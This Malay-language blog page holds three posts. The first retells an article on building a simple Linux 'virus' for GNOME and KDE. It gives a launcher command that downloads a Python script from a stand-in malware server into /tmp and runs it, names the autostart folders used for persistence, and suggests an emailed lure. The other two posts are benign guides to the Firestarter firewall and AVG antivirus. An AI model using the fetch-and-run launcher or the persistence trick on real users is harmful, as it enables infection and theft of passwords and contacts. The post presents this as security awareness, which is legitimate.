Menghasilkan virus untuk linux dalam 5 langkah “mudah”.

Geekzone(http://www.geekzone.co.nz/foobar/6229) telah menghasilkan satu artikel hebat menerangkan satu persatu tentang cara-cara menghasilkan virus untuk linux atau lebih tepat lagi, virus untuk desktop environment GNOME dan KDE. Artikelnya berkisar tentang “bagaimana virus tersebut akan dilarikan, beroperasi, ruang lingkup kerosakan dan kerumitan yang mampu dihasilkan dan cara mengatasi”.

Ini adalah ulasan semula kepada artikel tersebut menurut versi dan kefahaman saya sendiri.

Modus operandi virus yang ingin dihasilkan ialah mudah – buatkan seseorang pengguna komputer untuk melarikan executable attachment yang diattach kedalam email. Ini adalah modus operandi bagi virus yang paling mudah dan paling senang untuk diukur dan dikawal kebarangkalian kejayaannya. Dalam windows, attachkan sesuatu fail .EXE ke dalam email atau embeddedkan sesuatu virus (yang sebenarnya hanyalah kod program komputer) ke dalam fail yang tidak dicurigai seperti .JPG, .PNG, .DOC, .TXT, dan seumpamanya.

Antara sebab mengapa virus senang merebak ialah kerana sikap KETIDAKPEDULIAN pengguna komputer itu sendiri. Mereka tidak peduli apa yang mereka klik, apa yang bakal terjadi dan risiko yang menanti. Katakan anda attachkan satu fail virus dengan tajuk email “Tengok gambar artis kita bogel lagi..”. Kembang kempis lah hidung mamat yang buka email macam tu tanpa mengetahui yang dalam masa yang singkat sahaja komputernya akan dikuasai oleh virus jika ianya tidak dilengkapi dengan antivirus.

Menghasilkan virus untuk linux memerlukan beberapa cabaran yang tidak pernah wujud dalam windows. Dalam windows, fail EXE sahaja boleh menguasai satu komputer tanpa perlu mempunyai administration privilege. Kerana linux dan sistem berasaskan UNIX lain dilindungi oleh password yang anda sendiri pilih ketika proses pemasangan (atau password yang ditetapkan untuk akaun root), sehebat manapun virus linux yang anda hasilkan ianya tidak boleh menguasai komputer pada tahap adminitrative privilege. Kesan dan kebarangkalian kerosakkan yang bakal dihasilkan oleh mana-mana virus untuk linux HANYA akan berkisar kepada tahap pengguna sahaja. Antaranya ialah, virus tersebut boleh mencapai senarai email dari address book seseorang pengguna komputer, hantar email tersebut kepada malware server yang lain, memasang firefox extensions yang merakam password yang ditaipkan, melarikan desktop VNC tanpa pengetahuan pengguna, dan memulakan aktiviti popup untuk pengiklanan (seperti yang anda semua familiar dalam windows).

Membuat attachment di execute dalam linux.

Dalam linux, ubuntu sebagai contoh, sesuatu file yang didownload dari internet atau dari attachment email tidak boleh di run kerana permissionnya belum disetkan kepada executable file. Ciri ini merupakan satu perbezaan besar antara linux dan windows dari segi keselamatan. Namun, meskipun linux mempunyai ciri keselamatan yang sebegitu rupa, desktop environment seperti GNOME dan KDE masih mempunyai lubang-lubang kelemahan (vulnerabilities) dan bagi kes ini, GNOME dan KDE mempunyai apa yang dipanggil launcher yang membuka ruang kearah kebarangkalian untuk sesuatu fail itu di execute. Dalam GNOME misalnya, launcher biasanya mempunyai kebolehan memproses bash command dan katakan anda setkan command kepada sesuatu seperti berikut;
% bash -c "curl http://www.some_malware_server.org/s.py -o /tmp/s.py; python /tmp/s.py"

Command sebegini yang disematkan dalam sesuatu launcher akan menggunakan “curl” untuk mendownload s.py dari server yang mana s.py ini ialah script yang ditulis dalam Python untuk melakukan tugas-tugas berikutnya. s.py ini akan disimpan dalam direktori sementara iaitu /tmp dan command seterusnya akan execute script tersebut.

NOTA : Ubuntu tidak mempunyai fungsi curl tetapi mempunyai sesuatu yang lain iaitu wget untuk mendownload sesuatu dari internet menerusi command line.

Sekarang ianya bergantung kepada apa yang mampu dilakukan oleh script s.py tersebut. Ini samada sekali bergantung kepada kreativiti penulis script s.py tersebut. Seperti yang dibincangkan sebelum ini, tahap kerosakkan maksima yang mampu dihasilkan oleh virus dengan cara begini hanyalah berkisar pada tahap normal user. Apa yang boleh anda lakukan sebagai normal user, itu jugalah yang mampu dihasilkan oleh script ini.

Autorestart?

Sebagaimana yang boleh dilakukan dalam windows, lubang-lubang kelemahan dalam desktop environment dalam linux juga memberikan kebarangkalian yang cukup luas untuk membolehkan ia autorestart setiap kali pengguna membuka komputer linux mereka. Dalam GNOME, sila buka ~/.config/autostart . Direktori tersembunyi ini mengandungi launcher yang anda setkan untuk autostart setiap kali sesi GNOME dimulakan. Dalam KDE pula, direktorinya ialah ~/.kde/Autostart .

Bacaan lanjut dalam geekzone.

NOTE : Apa yang diharapkan dari artikel dan maklumat sebegini ialah untuk meletakkan kayu ukur tahap keselamatan sistem operasi berasaskan linux yang menggunakan desktop environment GNOME mahupun KDE. Berfikir atas konsep ilmu. Semoga bermanfaat.

Keselamatan : Firestarter Firewall

Selain daripada virus, kita perlu juga sedar bahawa firewall adalah pertahanan terawal diantara kita dan juga internet. Didalam linux kita tidak perlu risau akan virus, namun kita perlu berjaga-jaga kerana linux terutama server seringkali di exploit oleh para hacker. Jadi cara untuk menyelamatkan diri daripada serangan exploit adalah dengan menggunakan firewall untuk menutup port-port yang tidak perlu.

Didalam kernel Linux terdapat module yang menjalankan tugas menapis data yang keluar masuk kedalam komputer kita. Module tersebut dipanggil iptable dan ipchain. Selain itu didalam Ubuntu sendiri telah terdapat satu lagi software penapisan atau firewall yang dipanggil UFW (Uncomplicated FireWall), walaubagaimanapun buat masa ini ketiga-tiga firewall diatas adalah agak rumit kepada mereka yang baru dalam dunia Ubuntu/Linux kerana configuration ketiga-tiga software ini adalah berasaskan teks (text based). Jadi saya mahu memperkenalkan Firestarter Firewall yang mempunyai GUI (graphical user interface) dan juga mudah untuk mengendalikannya.

Untuk memasang software ini, anda boleh menggunakan Add/Remove Application atau menggunakan Synaptic Package Manager. Bagi saya lebih selesa menggunakan terminal dengan arahan:

sudo apt-get install firestarter

Anda boleh mendapatkan maklumat mengenai firewall ini di

http://www.fs-security.com/

Apabila anda sudah siap memasang firewall ini, anda bolehlah menggunakan shortcut menu Applications -> Internet -> Firestarter atau System -> Administration -> Firestarter. Saya tidak tahu kenapa shortcut ini dibina dua kali secara default. Kita perlu memasukkan sudo password untuk menjalankan firestarter.

Kemudian kita perlu membuat sedikit setting yang dijalankan oleh Wizard software ini. Amat mudah.

First time run kan firewall wizard ini akan keluar dahulu.

Main window untuk software ini.

About Firestarter

Antara configuration software yang terdapat didalam software.

ICMP filtering akan boleh digunakan sekiranya anda tidak mahu komputer lain ping ke komputer anda. Ini bagi mengelakkan serangan Denial of Service (DoS).

Didalam software ini anda dapat menetapkan supaya port mana yang dibuka dan ditutup. Didalam contoh diatas saya menutup port 110 dan 25 yang selalu digunakan oleh POP dan SMTP iaitu penghantaran mesej elektronik (email). Saya juga menghalang sebarang connection kepada IP Address 124.68.135.63 (Ntah mana2 punya IP buat demo ja..). Ada beberapa setting atau policy lain yang boleh dibuat. Cuma buat masa ini saya hanya menunjukkan yang ini sahaja dahulu.

Ini adalah contoh Firestarter sedang melakukan tugasannya. Menurut laman web Firestarter, sekiranya tulisan ini berwarna hitam, ia menunjukkan perkara biasa. Namun sekiranya ia berwarna merah, maknanya ada pihak yang cuba membuat sambungan ke komputer anda tanpa pengetahuan anda atau sambungan tersebut datang daripada host atau service yang diblok.

Setakat ini sajalah dulu tentang firewall ini. Sekiranya anda mempunyai masalah, bolehlah menyatakan diruang comment dibawah.

Sekian.

Keselamatan : Antivirus AVG Free Edition

Bagi saya masalah utama kepada para pengguna komputer ialah tentang keselamatan komputer kita. Ia termasuklah keselamatan dari penceroboh mahupun virus yang semakin hari semakin canggih terutama untuk platform microsoft windows. Walaupun pengguna Ubuntu/Linux tidak perlu risau akan virus-virus ini kerana mengikut satu laporan buat masa ini hanya terdapat beberapa virus untuk linux sahaja, namun lebih baik kita berhati-hati.

Antivirus ini juga berguna kepada mereka-mereka yang membuat dual boot dimana didalam system mereka terdapat partition dan juga software microsoft windows yang dijangkiti virus dan masalah virus itu boleh diselesaikan didalam Ubuntu.

Terdapat beberapa antivirus untuk Ubuntu/Linux, namun kali ini saya ini me'review'kan antivirus AVG Free. Disini perkataan free bukanlah bermaksud freedom yang diperjuangkan oleh kumpulan OpenSource tetapi ia bermaksud software ini boleh digunakan secara percuma. Terdapat satu lagi antivirus untuk Linux yang berasaskan opensource yang dipanggil ClamAV. ClamAV akan direview selepas ini.

Untuk menginstall antivirus ini anda perlu ke laman web AVG Free Edition di:

http://free.grisoft.com/ww.download?prd=afl

(Sila klik diatas gambar untuk lihat gambar besar)




Anda perlu mendownload package untuk Ubuntu/Debian (.deb). Selepas mendownload package ini, anda bolehlah samaada menggunakan GUI (gdebi) dengan double klik package tersebut atau menggunakan terminal dengan arahan sudo dpkg -i avg75fld-r51-a1243.i386.deb

Anda boleh menjalankan software ini dengan menggunakan shortcut di Application -> Accessories -> AVG for Linux Workstation. Sekira anda menggunakan software ini tanpa kebenaran Super User (sudo) anda hanya boleh mengimbas (scan) folder didalam home folder account anda dan temporary file sahaja. Sekiranya anda ingin scan seluruh komputer atau mengemaskinikan antivirus anda, anda perlu menjalankan dengan kebenaran Super User. Arahannya ialah sudo avggui.

Dibawah ini beberapa screenshot semasa saya menggunakan antivirus AVG Free ini.

Ini adalah skrin semasa pertama sekali apabila jalankan AVG Free

Configuration yang ada didalam AVG Free untuk Linux

Pilihan untuk membuat imbasan (scan). Untuk imbasan seluruh komputer perlu menggunakan kebenaran super user atau root.

Setting untuk update AVG Free. Perlu dijalankan menggunakan arahan sudo.

AVG Free sedang menjalankan tugasnya. Yahooo!!!! tiada virus..

Object test 115 ja ?? saja nak buat demo.. Malas nak scan banyak2, bukan ada virus pon..

AVG Free sedang mengemaskinikan virus definition..

About AVG Free

Kepada mereka yang risau akan virus bolehlah menggunakan antivirus ini untuk mengimbas Ubuntu/Linux anda dan juga partition microsoft windows.

Sekian.